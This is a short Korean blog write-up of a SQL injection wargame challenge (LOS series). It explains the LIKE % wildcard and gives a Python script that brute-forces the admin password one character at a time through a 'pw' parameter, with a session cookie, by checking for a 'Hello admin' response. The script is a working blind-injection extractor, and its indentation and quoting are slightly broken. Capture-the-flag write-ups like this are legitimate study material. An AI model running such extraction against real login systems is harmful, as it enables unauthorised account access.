like에는 % 정규식 비슷한게 있다.
https://www.w3schools.com/sql/sql_like.asp
이 문제는 조금 당황스러운 문제였다.
아무리해도 어드민이 뜨지 않는 것이다.
그래서 혹시 어드민과 게스트의 비밀번호가 비슷한게 아닐까 라는 생각을 하게 되었다.
import requests
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}
strs = "8_"
for i in range(8):
for c in range(48,125):
rs = requests.get(url + "?pw=" + strs + chr(c) + "%" ,headers=headers, cookies=cookies)
text = rs.text
if("<br><h2>Hello admin</h2>" in text):
strs += chr(c)
print(str(i+1) + " " +chr(c) + " find it”)
'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글
| [LOS1] succubus (0) | 2018.09.22 |
|---|---|
| [LOS1] zombie_assassin (0) | 2018.09.22 |
| [LOS1] giant (0) | 2018.09.22 |
| [LOS1] bugbear (0) | 2018.09.22 |
| [LOS1] darkknight (0) | 2018.09.22 |